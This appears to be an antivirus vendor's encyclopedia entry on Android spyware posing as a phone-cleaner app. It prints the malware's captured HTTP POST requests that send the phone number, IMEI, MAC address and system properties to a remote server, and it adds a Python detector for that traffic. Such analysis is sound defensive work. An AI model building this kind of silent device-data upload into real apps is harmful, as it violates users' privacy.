Android/Odpa.A!tr.spy

Analysis

Android/Odpa.A!tr.spy is malware which targets Android mobile devices and sends detailed device information to a remote server.

Technical Details

The malware comes packaged as cn.com.opda.android.clearmaster, an application that cleans up your smartphone (removing cache and history, batch removal of applications, etc.).
However, at startup, the sample sends a range of device information to a remote server via HTTP POST:
POST /app/update HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip,deflate
Charset: utf-8
Content-Type: multipart/form-data; boundary=---------7d4a6d158c9
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; sdk Build/KK)
Host: [CENSORED]kx.net
Content-Length: 873
-----------7d4a6d158c9
Content-Disposition: form-data; name="json"

{"device":{"info":{"model":"sdk","vendor":"unknown",
"product_name":"","secure":1,"bootloader":"unknown",
"kernel":"3.4.0-gd853d22\nnnk@nnk )","board":"",
"tel_number":"15555215554","cid":"","build_product":"generic",
"version":"","baseband":"unknown","model_internal":"",
"description":"sdk-eng 4.4.2 KK 938007 test-keys","sim_operator":"XXXYZ,"
,"product_brand":"generic","product_board":"","build_id":"KK",
"keyboards_devname":"","sdk":"19","device_width":768,"device_height":1184,
"product_device":"generic","release":"4.4.2","identifier":""}},"wifimac":"","configversion":1000,
"locale":"en","imei":"000000000000000"}
In another POST request, it sends the contents of numerous system properties to the remote server:
POST /device/model_miss HTTP/1.1
...
{"device":{"prop":{"ro.product.manufacturer":"unknown"
,"ro.product.brand":"generic","ro.carrier":""
,"ro.product.model":"sdk",
The system properties which are sent are:
  • ro.baseband
  • ro.board.platform
  • ro.bootloader
  • ro.build.id
  • ro.build.version.sdk
  • ro.build.version.release
  • ro.build.description
  • ro.build.product
  • ro.carrier
  • ro.chipname
  • ro.cid
  • ro.hardware
  • ro.htc.common.version
  • ro.modversion
  • ro.model.internal
  • ro.product.version
  • ro.product.board
  • ro.product.device
  • ro.product.name
  • ro.product.manufacturer
  • ro.product.brand
  • ro.product.model
  • ro.serialno
  • ro.semc.product.name
  • gsm.sim.operator.numeric.2
  • hw.keyboards.0.devname
The most sensitive pieces of information the malware posts are:
  • phone number
  • IMEI
  • MAC address
  • indication whether the device is rooted or not ("secure")
  • carrier name
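As an added defender-side example (not part of the original analysis), the following Python parses a multipart/form-data request shaped like the /app/update capture above, extracts the "json" field and flags the sensitive keys listed here. The sample request, the placeholder host, and the alert threshold of two or more sensitive fields are constructed assumptions.

```python
import json
import re
from typing import Optional
# Constructed sample modelled on the /app/update request above (not a real packet; host is a placeholder).
SAMPLE_REQUEST = (
    "POST /app/update HTTP/1.1\r\nHost: example.invalid\r\n"
    "Content-Type: multipart/form-data; boundary=---------7d4a6d158c9\r\n\r\n"
    "-----------7d4a6d158c9\r\n"
    'Content-Disposition: form-data; name="json"\r\n\r\n'
    '{"device":{"info":{"model":"sdk","secure":1,"tel_number":"15555215554"}},'
    '"wifimac":"","configversion":1000,"locale":"en","imei":"000000000000000"}\r\n'
    "-----------7d4a6d158c9--\r\n"
)
# Keys the analysis lists as the most sensitive exfiltrated values, and the two request paths it shows.
SENSITIVE_KEYS = {"tel_number", "imei", "wifimac", "secure", "sim_operator"}
SUSPICIOUS_PATHS = {"/app/update", "/device/model_miss"}

def extract_json_part(raw: str) -> Optional[dict]:
    """Return the parsed 'json' multipart field of a raw HTTP request, if any."""
    m = re.search(r"boundary=(\S+)", raw)
    if not m:
        return None
    delimiter = "--" + m.group(1)           # body delimiter is '--' + boundary
    _, _, body = raw.partition("\r\n\r\n")  # drop the HTTP headers
    for part in body.split(delimiter):
        if 'name="json"' in part:
            _, _, payload = part.partition("\r\n\r\n")  # drop the part headers
            try:
                return json.loads(payload.strip())
            except json.JSONDecodeError:
                return None
    return None

def find_sensitive(obj, path=""):
    """Walk nested dicts and collect (dotted_path, value) for sensitive keys."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            dotted = f"{path}.{key}" if path else key
            if key in SENSITIVE_KEYS:
                hits.append((dotted, value))
            hits.extend(find_sensitive(value, dotted))
    return hits

def inspect_request(raw: str) -> dict:
    """Alert when a known C2 path carries two or more of the sensitive fields."""
    path = raw.split(" ", 2)[1] if " " in raw else ""   # request-target of the request line
    hits = find_sensitive(extract_json_part(raw) or {})
    return {"path": path, "sensitive_fields": hits,
            "alert": path in SUSPICIOUS_PATHS and len(hits) >= 2}
```

The dotted paths in the result (for example device.info.tel_number) show where in the nested JSON each leaked value sits, which is what you would want to record in an alert.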
The malware contains the following files:
  • ./META-INF/CERT.RSA
  • ./META-INF/MANIFEST.MF
  • ./META-INF/CERT.SF
  • ./AndroidManifest.xml
  • ./resources.arsc
  • ./classes.dex
  • several resources
  • ./assets/filepath.db: a database of application package names with their paths
  • ./assets/RemoteTools.jar
It uses external SDKs, such as:
  • Google Ads
  • Android Support v4
  • Umeng
These SDKs are not malicious, but they may be undesirable for reasons such as privacy leaks, additional network traffic, etc.
The malware asks for the following permissions:
  • READ_CONTACTS
  • ACCESS_WIFI_STATE
  • READ_LOGS
  • INTERNET
  • VIBRATE: this is used to trigger cleaning the smartphone.
  • READ_HISTORY_BOOKMARKS
This malware was found on an alternative marketplace.

Recommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

FortiGate                   Extreme
FortiClient                 Extended
FortiMail                   Extended
FortiSandbox                Extended
FortiWeb                    Extended
Web Application Firewall    Extended
FortiIsolator               Extended
FortiDeceptor               Extended
FortiEDR